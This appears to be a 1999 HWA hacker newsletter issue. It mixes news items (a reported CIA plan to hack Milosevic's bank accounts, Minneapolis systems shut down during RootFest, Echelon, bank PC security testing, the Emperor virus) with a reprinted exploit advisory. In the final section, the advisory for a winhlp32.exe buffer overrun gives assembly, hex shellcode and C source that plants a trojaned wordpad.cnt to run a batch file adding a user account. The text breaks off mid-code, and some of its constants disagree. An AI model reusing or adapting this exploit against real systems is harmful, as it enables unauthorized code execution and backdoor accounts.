Intelligence sources believe they have identified banks in several countries, including Russia, Greece and Cyprus, where the Serb leader has hidden millions of dollars. But the Hollywood vision of a brainy nerd draining bank accounts from his computer at CIA headquarters is a fantasy. According to government intelligence experts, agents would have to visit each of the banks, set up new accounts, then carefully watch how the institution operates and look for weak links in its security. The National Security Agency's hackers would use that information to try to overcome today's sophisticated encryption software and fire walls. If they gained access, the hackers could do almost anything they liked with Milosevic's cash—steal it, move it to a dummy account or slowly drain it away a few thousand dollars at a time. But should they? The idea of a U.S.-sponsored plan to break into foreign banks unnerves some intelligence officials, who point out that the operation would be a breach of national sovereignty in friendly countries and open the door to computer attacks on U.S. banks. What's more, the United States would be the main loser if confidence in the world banking system were undermined. The sabotage plan also entails some serious problems. The CIA would somehow have to find and train guerrillas without helping the Kosovo Liberation Army, which the administration itself labeled a terrorist organization just a year ago and which is believed to fund its operations with profits from international drug smuggling. In the chaos now prevailing in Kosovar refugee camps it will not be easy for the CIA to make sure the anti-Milosevic rebels it signs up have no KLA ties. Intelligence officials also worry it would be difficult to control the U.S.-trained rebels once boot camp is over and they are set loose on Milosevic. "I'm afraid they could use their training to carry out atrocities," says John Rothrock, the Air Force's former chief of intelligence planning. "If they think they can rein them in, it's tremendous naiveté." Congress can complain all it likes, but it has no legal authority to stop the finding. Lawmakers can try to block the plan by refusing to provide money for the covert action, but the president can tap into his emergency funds to finance it. At this point, it is not at all certain that the finding will ultimately be carried out. If the grumblings from the Hill and the intelligence community grow too loud, or if the risk-averse CIA chooses to drag its feet, the president may opt to quietly kill the finding—and pretend it never existed. Newsweek, May 31, 1999 @HWA 03.1 More on the Cyberwar ~~~~~~~~~~~~~~~~~~~~ Contributed by Twstdpair (Source: MSNBC) Cyberwar? The U.S. stands to lose Experts argue plan to raid Milosevic's bank accounts would do more harm than good May 28 - It sounded like a TomClancy spy novel.Newsweekreported last week that the CIAwas planning to tinker withinternational bank accounts fullof Slobodan Milosevic's money -just another way of getting under the Yugoslav president's skin. Information warfare experts disagree about the feasibility of such a cyberattack. But there's little disagreement the U.S. stands to lose much more than itmight gain from firing the firstvolley in such an infomation war.In fact, some believe damage has already been done. THE NEWSWEEK STORY RAISED several issues: What international lawswould govern a U.S.-backed attack ona bank in a third-party nation? Is suchan attack feasible in the first place? What kind of retaliation might U.S.citizens, and their bank accounts, face? But most important, what does even the possibility of such an attack do to the integrity of international banking systems? The story on the cyberattack - fact, fiction or somewhere in between - could already have put the U.S. at risk,said Kawika M. Dajuio, executive vice president of the Financial Information Protection Association. Banking systems hinge on public confidence. You put the money in; you're confident you'll be able to take the money out. If there's any hint you might not be able to get at your money, you'd withdraw it. Any attack on the integrity of a banking system anywhere - particularly when retaliation seems like such an obvious possibility - chips away at public confidence. "It bothers me because we have had conversations with the defense and intelligence community. We thought this was off the table," Dajuio said. "We've had discussions with rather senior policy-makers. We thought they understood the importance of protecting public confidence in the payment system." But retaliation by foreign agents might be just one source of insecurity for U.S. account holders. There's another: If the government can and is willing to tinker with foreign accounts, what will stop it from tinkering with mine? COULD IT BE DONE? Could U.S. agents hijack Milosevic's money, allegedly stashed away in foreign banks? Yes and no. Experts agree that the CIA has had the know-how to control bank accounts for years, through old- fashioned non-cyber methods, such as coercing bank authorities, or even through legal methods such as freezing accounts. On the other hand, it's not easy when the target knowns what's coming. According to MSNBC analyst Bill Arkin, the international community, including UNSCOM, is still trying to get its hands on Saddam Hussein's assets. And such real-world tactics are a far cry from the cyberwar image of a few CIA hackers sitting at a keyboard moving around money thanks to an Internet connection and some wits. There's disagreement about how possible that might be. "The audits we have performed tell us [banks] are not invulnerable," says a security expert identifying himself as Space Rogue. Rogue works at L0pht Heavy Industries, which hires out to hack corporate computer systems to test their vulnerability. "Banks have a little more security in place, but that security is still not at a level where it's unbreakable." While money systems aren't connected to the public Internet, "sometimes they have a modem dangling off for remote access, or they use cryptography, but not correctly," he said. Others suggest cracking a bank that holds Milosevic money - outside the more traditional methods - is nearly impossible. "I deal in probabilities, and I've never seen it," said a man identifying himself as Louis Cipher, a principal investor in Infowar.com. Cipher is also in charge of security at what he says is the "sixth-largest brokerage in America." He suggested very few individuals have the skills necessary to "tunnel" from an Internet connection through mainframe systems in banks - in fact, a team of specialists and inside information would be required."You'd have to be an applications specialist to even navigate to a screen," he said. "You're talking well beyond the skills of hackers. It would have to be an insider working with Job Control Language sitting on the mainframe. The only one who would have that ability other than the U.S. government would be organized crime." And Cipher is skeptical about the U.S. government's ability to hire and hold the brightest minds in the security industry - since no government agency can match the lure of stock options offered by a high-tech firm. Still, even the possibility of the U.S. using a wired computer to move Milosevic's money drew swift reaction from information warfare observers. Even hacker groups protested the notion, with a hacker calling himself "sixtoed" setting up a Web page in protest. The reason: Since the U.S. relies more on technology and information than any other nation, it stands to lose the most from such a cyberwar. "I am not one for an information arms race," said Frank Cilluffo, senior analyst at the Center for Strategic and International Studies in Washington. "We will lose that race.... We're a hell of a lot more susceptible to retaliation. The defensive implications outweigh the offensive implications." Anyone can build up an information warfare capability, Cilluffo said. And it's much more like guerrilla war than nuclear war - it's easy for the enemy to hide, and there's no real deterrent. Therefore, retaliation could be swift and indiscriminate. In addition, there is a general principle among security experts suggesting once a system's security is compromised, it's much easier to compromise a second time. So the U.S. could very well be paving the way for retribution. WHY NO DENIALS? Fear of such retaliation attempts, or even the perception of such retaliation attempts, drove Dajuio to start calling his friends on the intelligence community to complain as soon as the Newsweek story hit. He has yet to receive the reassurance he was hoping for. "If it's true or it's just leaks, it's bad to have the story out there," Dajuio said. "I have yet to have anyone tell me 'Don't worry, everything's OK.' ... If they haven't done anything, the most appropriate thing to do is to come out and say they're not doing it." The CIA isn't doing that; a spokesperson told MSNBC the agency couldn't comment on its activities, but one source familiar with U.S. intelligence capabilities tells MSNBC to be "very skeptical" of the Newsweek story. Meanwhile, opening the Pandora's box of cyberwar would lead to a series of yet-to-be answered questions. International law isn't ready to handle such conflicts, says Cilluffo - so if the U.S. broke into a bank in Cyprus, what laws would govern that act? And could the compromised bank sue the U.S. government? "What are the rules of engagement here?" Cilluffo asked. "What is game, what is not game? This may be a harbinger of how we prosecute and wage war in the future." @HWA 04.0 RootFest Scares Officials In Minneapolis ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by erewhon The hacker convention RootFest was held in Minneapolis over the weekend. Evidently this scared the local authorities enough to shut down several vulnerable points in its computer network. The city respond to the three day hacker convention by shutting down some older dial-up modem lines. (Wonder if they will come back online afterwards?) Other reports also indicate that the Minneapolis City Police also shut down its computer network over the weekend. APB Online http://www.apbonline.com/911/1999/05/21/hackers0521_01.html WCCO Channel 4 http://www.wcco.com/news/stories/news-990521-184737.html RootFest http://www.rootfest.org City of Minneapolis Action Plan http://www.rootfest.org/Press/park.txt APB Online: HACKERS WORRY MINNEAPOLIS OFFICIALS City Secures Its Computers as Conference Comes to Town May 21, 1999 By Hans H. Chen MINNEAPOLIS (APBNews.com) -- The arrival of several hundred computer hackers this weekend has prompted the city to shut down several vulnerable points in its computer network. While the city's computer guru called the weekend shutdown "an opportunity to remind ourselves of network-based security," the conference organizer called the measures "an overly paranoid precaution." The hackers descended today on the Minneapolis Convention Center for RootFest 99, a three-day discussion of computer security open to "the computer underground, hackers, IT professionals, government agents, feds," according to the conference's Web site. The conference features sessions entitled "Circumventing Internet Censorship," and "Internet Security in Europe: State of Affairs." Speakers include both hackers and computer security consultants City downplays concerns But the city responded to the event by closing off some older dial-up modem lines that a few telecommuting employees and remote city agencies still use to connect into the city's network. Don Saelens, the city's information technology manager, downplayed concerns about possible hacking attempts. The conference, Saelens said, presented "an opportunity to remind ourselves of network-based security." But Saelens did admit that the timing of the system shutdown was not wholly coincidental. "We've been doing a number of upgrades on our own networks, and these were all slated to go out anyway this year," Saelens said. "I have to admit, [this conference] was a reminder of network security that heightened the awareness." Police reportedly shut down In addition, the Minneapolis Star Tribune reported that the city Police Department shut down its computer network over the weekend. Saelens and a police official refused to confirm the report, citing safety concerns. "The only thing the police is saying is we are not releasing anything we are doing for security reasons," said Penny Parrish, a police department spokeswoman. 'Hacker threat'? Chris Lothos, an organizer of RootFest, attacked the city's measures in a dispatch on the RootFest Web site. "It's an overly paranoid precaution taken for the 'hacker threat' that RootFest supposedly poses to the world at large," Lothos wrote. The conference also printed on its Web site a copy of the e-mail memo Saelens sent to city employees alerting them to the security measures. Saelens said he's not sure how the group got a copy of his e-mail. >Subject: FW: NOTICE TO ALL PARK BOARD COMPUTER USERS regarding Hacker >Conference this weekend >Importance: High > >Minneapolis Park and Recreation ITS Hacker conference action plan: > > In response to the City's action plan noted below, Park Board ITS >will be disabling the Park Board's Email services Friday evening, May 21st >through Monday morning, May 24th. Park Board users will not have access >at all to their Park Board Email accounts during this time. > >In addition - Dial-In (Reachout) services will be disabled Thursday >evening, May 20th beginning at 8:00pm through Monday morning, May 24th. >The Minneapolis rec centers and other remote users will not be able to >access their Reachout accounts during this time. Remote PEIRS users >entering time are advised to do so by Thursday evening, May 20th by >8:00pm. >PEIRS users downtown, at the SSSC, or on frame-relay (golf courses) will >be able to enter in time as usual. > >If you have questions, please contact the Park Board Help Desk at >661-XXXX. Thank you for your cooperation. > >Larry Brandts >Park Board ITS Manager > > >-----Original Message----- >From: XXXXXXXXXXX Sent: Wednesday, May 19, 1999 10:35 AM >To: All Exchange Users >Subject: NOTICE TO ALL CITY COMPUTER USERS > >To all City Staff, >RootFest '99, a convention of so-called computer "hackers" will be meeting >in Minneapolis this weekend, May 21-23. You may have read news stories >about individuals (hackers) who have used their computer programming >skills to gain unauthorized access (hack) into computer networks of >government agencies, businesses, banks, or other high-profile >organizations. Sometimes, these individuals hack into computers to >perform fairly harmless computer pranks. However, that is not always the >case. Hackers can also infect entire computer networks with disabling >viruses. > >As a precautionary measure, we are reminding you of safe computing >practices that should already be followed, as well as some additional >steps we will be taking to protect the City from any unauthorized access >to our network. To be successful, we will need the active participation >of all City staff. > >1. Employees must turn off their computer terminals at the close of >business each night. > >2. Those who have an individual analog phone line and modem should be >turning off the modem every night. There are very few of these individual >analog lines and modems left in the City, and they are being phased out >because of their risk to network security. Anyone who has one of the new >City image pc's does not have worry about this issue, as they are using >the new City standard for remote access. If you have not had a line/modem >installed, you do not need to do anything except turn off your pc. > >3. Employees will not have access to their City email accounts at all >beginning Friday evening through Monday morning. There will not be access >to email outside of the City from Thursday evening through Monday morning. > >4. Access to the City's network from outside locations will be >temporarily cancelled Thursday evening through Monday morning. This will >not impact the majority of staff members, but as an example, if you can >currently check your City email account from home, you will not be able to >do so during that timeframe. > >Employees who will be at work over the weekend will have access to Insite, >the City's intranet, as well as the Internet. > While I do not believe the City will be a target for these individuals, >it >is a prudent business decision to follow these simple safety precautions. >If you have questions regarding any of these steps, please contact Wanda >Forsythe, in ITS Security. Her number is 673-XXXX. > >Thank you for your attention to this matter. > >- Don Saelens >* * * * * * * Sara Dietrich, Communications Department >673-XXX; 673-XXXX (fax) @HWA 05.0 Australia Admits to Echelon ~~~~~~~~~~~~~~~~~~~~~~~~~~~ from HNN http://www.hackernews.com/ contributed by erewhon Martin Brady, director of the Defense Signals Directorate in Canberra Austrailia has admitted that his country does participate in a secret spy organization known as UKUSA. This organization works with the intelligence agencies of Australia, Canada, New Zealand, the UK and the USA to intercept every fax, telex, e-mail, phone call, or computer data that is carried via commercial satellite communications. This global eavesdropping is known as Echelon The Age http://www.theage.com.au/daily/990523/news/news3.html The Age; Careful, they might hear you By DUNCAN CAMPBELL Australia has become the first country openly to admit that it takes part in a global electronic surveillance system that intercepts the private and commercial international communications of citizens and companies from its own and other countries. The disclosure is made today in Channel 9's Sunday program by Martin Brady, director of the Defence Signals Directorate in Canberra. Mr Brady's decision to break ranks and officially admit the existence of a hitherto unacknowledged spying organisation called UKUSA is likely to irritate his British and American counterparts, who have spent the past 50 years trying to prevent their own citizens from learning anything about them or their business of ``signals intelligence'' - ``sigint'' for short. In his letter to Channel 9 published today, Mr Brady states that the Defence Signals Directorate (DSD) ``does cooperate with counterpart signals intelligence organisations overseas under the UKUSA relationship". In other statements which have now been made publicly available on the Internet (www.dsd.gov.au), he also says that DSD's purpose ``is to support Australian Government decision-makers and the Australian Defence Force with high-quality foreign signals intelligence products and services. DSD (provides) important information that is not available from open sources". Together with the giant American National Security Agency (NSA) and its Canadian, British, and New Zealand counterparts, DSD operates a network of giant, highly automated tracking stations that illicitly pick up commercial satellite communications and examine every fax, telex, e-mail, phone call, or computer data message that the satellites carry. The five signals intelligence agencies form the UKUSA pact. They are bound together by a secret agreement signed in 1947 or 1948. Although its precise terms have never been revealed, the UKUSA agreement provides for sharing facilities, staff, methods, tasks and product between the participating governments. Now, due to a fast-growing UKUSA system called Echelon, millions of messages are automatically intercepted every hour, and checked according to criteria supplied by intelligence agencies and governments in all five UKUSA countries. The intercepted signals are passed through a computer system called the Dictionary, which checks each new message or call against thousands of ``collection'' requirements. The Dictionaries then send the messages into the spy agencies' equivalent of the Internet, making them accessible all over the world. Australia's main contribution to this system is an ultra-modern intelligence base at Kojarena, near Geraldton in Western Australia. The station was built in the early 1990s. At Kojarena, four satellite tracking dishes intercept Indian and Pacific Ocean communications satellites. The exact target of each dish is concealed by placing them inside golfball like ``radomes''. About 80 per cent of the messages intercepted at Kojarena are sent automatically from its Dictionary computer to the CIA or the NSA, without ever being seen or read in Australia. Although it is under Australian command, the station - like its controversial counterpart at Pine Gap - employs American and British staff in key posts. Among the ``collection requirements" that the Kojarena Dictionary is told to look for are North Korean economic, diplomatic and military messages and data, Japanese trade ministry plans, and Pakistani developments in nuclear weapons technology and testing. In return, Australia can ask for information collected at other Echelon stations to be sent to Canberra. A second and larger, although not so technologically sophisticated DSD satellite station, has been built at Shoal Bay, Northern Territory. At Shoal Bay, nine satellite tracking dishes are locked into regional communications satellites, including systems covering Indonesia and south-west Asia. International and governmental concern about the UKUSA Echelon system has grown dramatically since 1996, when New Zealand writer Nicky Hager revealed intimate details of how it operated. New Zealand runs an Echelon satellite interception site at Waihopai, near Blenheim, South Island. Codenamed ``Flintlock", the Waihopai station is half the size of Kojarena and its sister NSA base at Yakima, Washington, which also covers Pacific rim states. Waihopai's task is to monitor two Pacific communications satellites, and intercept all communications from and between the South Pacific islands. Like other Echelon stations, the Waihopai installation is protected by electrified fences, intruder detectors and infra-red cameras. A year after publishing his book, Hager and New Zealand TV reporter John Campbell mounted a daring raid on Waihopai, carrying a TV camera and a stepladder. From open, high windows, they then filmed into and inside its operations centre. They were astonished to see that it operated completely automatically. Although Australia's DSD does not use the term ``Echelon'', Government sources have confirmed to Channel 9 that Hager's description of the system is correct, and that the Australia's Dictionary computer at Kojarena works in the same way as the one in New Zealand. Until this year, the US Government has tried to ignore the row over Echelon by refusing to admit its existence. The Australian disclosures today make this position untenable. US intelligence writer Dr Jeff Richelson has also obtained documents under the US Freedom of Information Act, showing that a US Navy-run satellite receiving station at Sugar Grove, West Virginia, is an Echelon site, and that it collects intelligence from civilian satellites. The station, south-west of Washington, lies in a remote area of the Shenandoah Mountains. According to the released US documents, the station's job is ``to maintain and operate an Echelon site''. Other Echelon stations are at Sabana Seca, Puerto Rico, Leitrim, Canada and at Morwenstow and London in Britain. Information is also fed into the Echelon system from taps on the Internet, and by means of monitoring pods which are placed on undersea cables. Since 1971, the US has used specially converted nuclear submarines to attach tapping pods to deep underwater cables around the world. The Australian Government's decision to be open about the UKUSA pact and the Echelon spy system has been motivated partly by the need to respond to the growing international concern about economic intelligence gathering, and partly by DSD's desire to reassure Australians that its domestic spying activity is strictly limited and tightly supervised. According to DSD director Martin Brady, ``to ensure that (our) activities do not impinge on the privacy of Australians, DSD operates under a detailed classified directive approved by Cabinet and known as the Rules on Sigint and Australian Persons". Compliance with this Cabinet directive is monitored by the inspector-general of security and intelligence, Mr Bill Blick. He says that ``Australian citizens can complain to my office about the actions of DSD. And if they do so then I have the right to conduct an inquiry." But the Cabinet has ruled that Australians' international calls, faxes or e-mails can be monitored by NSA or DSD in specified circumstances. These include ``the commission of a serious criminal offence; a threat to the life or safety of an Australian; or where an Australian is acting as the agent of a foreign power". Mr Brady says that he must be given specific approval in every case. But deliberate interception of domestic calls in Australia should be left to the police or ASIO. Mr Brady claims that other UKUSA nations have to follow Australia's lead, and not record their communications unless Australia has decided that this is required. ``Both DSD and its counterparts operate internal procedures to satisfy themselves that their national interests and policies are respected by the others," he says. So if NSA happens to intercept a message from an Australian citizen or company whom DSD has decided to leave alone, they are supposed to strike out the name and insert ``Australian national'' or ``Australian corporation'' instead. Or they must destroy the intercept. That's the theory, but specialists differ. According to Mr Hager, junior members of UKUSA just can't say ``no''. ``... When you're a junior ally like Australia or New Zealand, you never refuse what they ask for.'' There are also worries about what allies might get up to with information that Australia gives them. When Britain was trying to see through its highly controversial deal to sell Hawk fighters and other arms to Indonesia, staff at the Office of National Assessments feared that the British would pass DSD intelligence on East Timor to President Soeharto in order to win the lucrative contract. The Australian Government does not deny that DSD and its UKUSA partners are told to collect economic and commercial intelligence. Australia, like the US, thinks this is especially justified if other countries or their exporters are perceived to be behaving unfairly. Britain recognises no restraint on economic intelligence gathering. Neither does France. According to the former Canadian agent Mike Frost, it would be ``nave" for Australians to think that the Americans were not exploiting stations like Kojarena for economic intelligence purposes. ``They have been doing it for years," he says. ``Now that the Cold War is over, the focus is towards economic intelligence. Never ever over-exaggerate the power that these organisations have to abuse a system such as Echelon. Don't think it can't happen in Australia. It does.'' @HWA 06.0 Banks to Test Home User PC Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ from HNN http://www.hackernews.com/ contributed by Weld Pond Worried that consumers PCs may be vulnerable to attack a consortium of the 15 largest US banks plan to open a lab to test PC Hardware and software. The Banking Industry Technology Secretariat, plan to open the lab this summer. (Its about time they started looking into this. Applications like Back Orifice have been around for what? over a year now? Sounds like someone is just covering their ass.) C|Net http://www.news.com/News/Item/0,4,0-36923,00.html?st.ne.ni.lh Big banks move on Net security By Tim Clark Staff Writer, CNET News.com May 21, 1999, 1:00 p.m. PT Worried that problems on home computers may make Internet banking insecure, a group of major U.S. banks is expected to unveil a plan this summer to open a lab to test the security of Web browsers and PC hardware and software. "The banks feel that firewalls and what they have internally is in great shape, but the link is to the consumer and PC environments [where they find security more suspect]," said Catherine Allen, chief executive of the Banking Industry Technology Secretariat, a division of Bankers Roundtable. BITS is governed by a board of CEOs of the 15 largest U.S. banks, including familiar names like Citibank, Chase Manhattan, Mellon Bank, Wells Fargo, and Bank of America. Edward Crutchfield, First Union chief executive, chairs BITS, a two-year-old group that focuses on technology issues affecting the U.S. banking system. The BITS Security/Technology Lab, to be run by a new banking-oriented division of government contractor SAIC, is due to be announced in late June or early July, with vice president Al Gore and former U.S. Sen. Sam Nunn invited to speak. A July meeting is planned in the San Francisco area to explain the program to hardware and software vendors. Security experts from major banks are currently drafting the testing criteria. In addition, the lab oversight group is working with the President's Commission on Critical Infrastructure Protection on ways to protect the nation's financial infrastructure from attacks by terrorist or organized criminal groups. President Clinton formed that group a year ago after a report on threats from cyber-terrorists. The effort also will involve information sharing among banks to ward off organized attacks, including use of neural networking and other technologies to detect and predict patterns of attacks. "If it's a terrorist or major criminal activity, we think it will happen in multiple places," Allen said. "They won't hit just one bank but many." Security planners worry that assaults could be mounted near the end of this year, when attackers hope banks might be distracted by the Y2K turnover. The testing of consumer devices and software will be coupled with educational campaigns urging users to utilize antivirus software and take other precautions to avoid security problems. Systems that pass the tests can use a special logo in their marketing to signify the products have been deemed safe by BITS. Also to be tested are systems to conduct financial transactions, including personal financial software, online billing and bill-paying packages, and smart cards. "Vendors want this as much as we do," Allen contended, saying that today vendors may get multiple requests from different banks to make specific changes for that bank's use. Funneling through the BITS lab would simplify that process. The effort comes as financial institutions are beginning to use the Internet for online banking, stock trading, and other transactions. In the past, online consumer transactions have been routed over private networks that banks regard as more secure. But the explosion of the Internet, which is not such a controlled or secure environment, has bankers looking for safety. Another reflection of that concern has been the efforts by Visa and MasterCard, on the behalf of their bank-owners, to push the Secure Electronic Transactions (SET) protocol for Internet credit card purchases. Although SET has not been widely adopted in the U.S., the prolonged push to implement it mirrors bankers' worries about their reputation as trusted institutions. But there's a financial implication too. Banks are heavily regulated, and they are required to reimburse their customers for any losses suffered because of security breaches in online financial transactions. As online banking grows, that could become a big liability. @HWA 07.0 EMPEROR VIRUS ~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Tuesday 25th May 1999 on 4.46 pm CET AVP announced new clone of the Cheronobyl virus named Emperor. The Emperor virus has additional technology to infect more systems by copying itself to more areas of the computer and has the possibility to travel further. It infects DOS (16-bit) COM and EXE programs and overwrites the Master Boot Record of the hard drive and boot sector on floppy diskettes. 08.0 WINHLP32.EXE BUFFER OVERRUN ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Tuesday 25th May 1999 on 1.01 am CET David Litchfield aka Mnemonix wrote an advisory on winhlp32.exe buffer overrun. "The buffer overrun in winhlp32.exe occurs when it attempts to read a cnt file with an overly long heading string. If the string is longer than 507 bytes the buffer overrun does not occur - winhlp32 just truncates the entry." Read the advisory below. Analysis of the winhlp32.exe buffer overrun. The buffer overrun in winhlp32.exe occurs when it attempts to read a cnt file with an overly long heading string. If the string is longer than 507 bytes the buffer overrun does not occur - winhlp32 just truncates the entry. The return address is overwritten with bytes 357, 358, 359 and 360. Everything before these bytes is lost giving us bytes 361 to 507 to play with - a total of 147 bytes for our exploit code. On playing around with the overrun we find we lose about another 20 of these bytes giving us only 127 bytes to play with - not a lot really. On overruning the buffer and analysing the contents of memory and the CPU's registers with a debugger we find that byte 361 is found at 0x0012F0E4. This is the address we need to get the processor to go to to get its next instruction - but this address has a NULL in it which totally messes things up. However, looking at the registers we can see that the ESP, the Stack Pointer, holds this address so if we can find somewhere in memory that does a JMP ESP, and set the return address to this then we should be able to get back to the address where we'll place our exploit code. Looking at the DLLs that winhlp32.exe uses we find that kernel32.dll has the JMP ESP instruction at 0x77F327E5 (Service Pack 4's version of kernel32.lib - I think it's at 0x77F327D5 on Service Pack 3's kernel32.dll). So we put 0x77F327E5 into bytes 357 to 360 but we have to load it in backwards so byte 357 we'll set to 0xE5, byte 358 to 0x27, byte 359 to 0xF3 and byte 360 to 0x77. Now we've jumped back to our exploit code we have to decide what we wan to put in it. Because we only have 127 bytes to do anything meaningful we need to start another program - the best thing is to get it to run a batch file. This means calling the system ( ) function which is exported by msvcrt.dll which isn't loaded into the address space of winhlp32.exe - so we'll have to load it. How do we do this? We have to call LoadLibrary ( ) which is exported by kernel32.dll which is in the address space. LoadLibraryA ( ) is exported at address 0x77F1381A so all we need to do is have the string "msvcrt.dll" in memory somewhere and call 0x77F1381A with a reference to the pointer to the null terminated "msvcrt.dll" string. Because it has to be null terminated we'll get our code to write it into memory. Once this is done we'll place the address of LoadLibraryA ( ) onto the stack then place the address of the pointer to "msvcrt.dll" and finally call LoadLibraryA ( ) using an offset from the EBP. The following is the Assembly Code needed to do this: /*First the procedure prologue */ push ebp mov ebp,esp /*Now we need some zeroes */ xor eax,eax /* and then push then onto the stack */ push eax push eax push eax /* Now we write MSVCRT.DLL into the stack */ mov byte ptr[ebp-0Ch],4Dh mov byte ptr[ebp-0Bh],53h mov byte ptr[ebp-0Ah],56h mov byte ptr[ebp-09h],43h mov byte ptr[ebp-08h],52h mov byte ptr[ebp-07h],54h mov byte ptr[ebp-06h],2Eh mov byte ptr[ebp-05h],44h mov byte ptr[ebp-04h],4Ch mov byte ptr[ebp-03h],4Ch /* move the address of LoadLibraryA ( ) into the edx register */ mov edx,0x77F1381A /* and then push it onto the stack */ push edx /* Then we load the address where the msvcrt.dll string can be found */ lea eax,[ebp-0Ch] /* and push it onto the stack */ push eax /* Finally we call LoadLibraryA( ) call dword ptr[ebp-10h] All things going well we should have now loaded msvcrt.dll into the address space of winhlp32.exe. With this in place we now need to call system() and provide the name of a batch file to it as an argument. We don't have enough bytes to play with to call GetProcessAddress ( ) and do the rest of the things we have to do like clean up so we check what version of msvcrt.dll we have before writing the code and see where system ( ) is exported at. On a standard install of Windows NT this will normally be version 4.20.6201 with system () exported at 0x7801E1E1. We'll call the batch file ADD.bat but to save room we won't give it an extention. The system ( ) function will try the default executable extentions like.exe, .com and .bat and find it for us then run it. Once it has run it the cmd.exe process system( ) has launched will exit. So we need to have the null terminated string "ADD" in memory and the address of system ( ). Below is the code that will write "ADD" onto the stack and then call system( ) /*First the procedure prologue */ push ebp mov ebp,esp /* We need some NULL and then push them onto the stack */ xor edi,edi push edi /* Now we write ADD onto the stack */ mov byte ptr [ebp-04h],41h mov byte ptr [ebp-03h],44h mov byte ptr [ebp-02h],44h /* Place address of system ( ) into eax and push it onto the stack */ mov eax, 0x7801E1E1 push eax /* Now load eax with address of ADD and push this too */ lea eax,[ebp-04h] push eax / * Then we call system ( ) */ call dword ptr [ebp-08h] Once the batch file has been run the Command Interpreter will exit and if we don't clean up after ourselves winhlp32.exe will access violate so we need to call exit (0) to keep it quiet. exit ( ) is also exported by msvcrt.dll at address 0x78005BBA - which has a null in it. It's not a major problem - we can fill a register with 0xFFFFFFFF and subtract 0x87FFA445 from it. The following code calls exit (0) /* Procedure prologue */ push ebp mov ebp,esp /* Round about way of getting address of exit () into edx */ mov edx,0xFFFFFFFF sub edx,0x87FFAF65 /* Push this address onto the stack */ push edx /* Get some nulls - this is our exit code - and push them too */ xor eax,eax push eax /* then call exit()! */ call dword ptr[ebp-04h] Altogether our code looks like this: push ebp mov ebp,esp xor eax,eax push eax push eax push eax mov byte ptr[ebp-0Ch],4Dh mov byte ptr[ebp-0Bh],53h mov byte ptr[ebp-0Ah],56h mov byte ptr[ebp-09h],43h mov byte ptr[ebp-08h],52h mov byte ptr[ebp-07h],54h mov byte ptr[ebp-06h],2Eh mov byte ptr[ebp-05h],44h mov byte ptr[ebp-04h],4Ch mov byte ptr[ebp-03h],4Ch mov edx,0x77F1381A push edx lea eax,[ebp-0Ch] push eax call dword ptr[ebp-10h] push ebp mov ebp,esp xor edi,edi push edi mov byte ptr [ebp-04h],43h mov byte ptr [ebp-03h],4Dh mov byte ptr [ebp-02h],44h mov eax, 0x7801E1E1 push eax lea eax,[ebp-04h] push eax call dword ptr [ebp-08h] push ebp mov ebp,esp mov edx,0xFFFFFFFF sub edx,0x87FFA445 push edx xor eax,eax push eax call dword ptr[ebp-04h] Now we need the operayion codes (opcodes) for all this which we do by writing a program that uses the __asm function and then debug it. This is what we actually load into our exploit code. Following is the source of a program that will create a "trojaned" wordpad.cnt. It will also create a batch file called add.bat - edit it as you see fit. I have compiled the program - you can get a copy of it from http://www.infowar.co.uk/mnemonix/winhlpadd.exe Note that this will run only on standard installs of NT with service pack 4 and expects an msvcrt.dll version of 4.20.6201 - run it from the winnt\help directory. Cheers, David Litchfield http://www.infowar.co.uk/mnemonix http://www.arca.com #include #include #include int main(void) { char eip[5]="\xE5\x27\xF3\x77"; char ExploitCode[200]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x 45\xF5\x53\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\x C6\x45\xFA\x2E\xC6\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x1A\x38\x F1\x77\x52\x8D\x45\xF4\x50\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x 41\xC6\x45\xFD\x44\xC6\x45\xFE\x44\xB8\xE1\xE1\xA0\x77\x50\x8D\x45\xFC\x50\x FF\x55\xF8\x55\x8B\xEC\xBA\xBA\x5B\x9F\x77\x52\x33\xC0\x50\xFF\x55\xFC"; FILE *fd; printf("\n\n*******************************************************\n"); printf("* WINHLPADD exploits a buffer overrun in Winhlp32.exe *\n"); printf("* This version runs on Service Pack 4 machines and *\n"); printf("* assumes a msvcrt.dll version of 4.00.6201 *\n"); printf("* *\n"); printf("* (C) David Litchfield (mnemonix@globalnet.co.uk) '99 *\n"); printf("*******************************************************\n\n"); fd = fopen("wordpad.cnt", "r"); if (fd==NULL) { printf("\n\nWordpad.cnt not found or insufficient rights to access it.\nRun this from the WINNT\\HELP directory"); return 0; } fclose(fd); printf("\nMaking a copy of real wordpad.cnt - wordpad.sav\n"); system("copy wordpad.cnt wordpad.sav"); printf("\n\nCreating wordpad.cnt with exploit code..."); fd = fopen("wordpad.cnt", "w+"); if (fd==NULL) { printf("Failed to open wordpad.cnt in write mode. Check you have sufficent rights\n"); return 0; } fprintf(fd,"1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%s%s\n",eip,ExploitCode) ; fprintf(fd,"2 Opening a document=WRIPAD_OPEN_DOC\n"); fclose(fd); printf("\nCreating batch file add.bat\n\n"); fd = fopen("add.bat", "w"); if (fd == NULL) { printf("Couldn't create batch file. Manually create one instead"); return 0; } printf("The batch file will attempt to create a user account called \"winhlp\" and\n"); 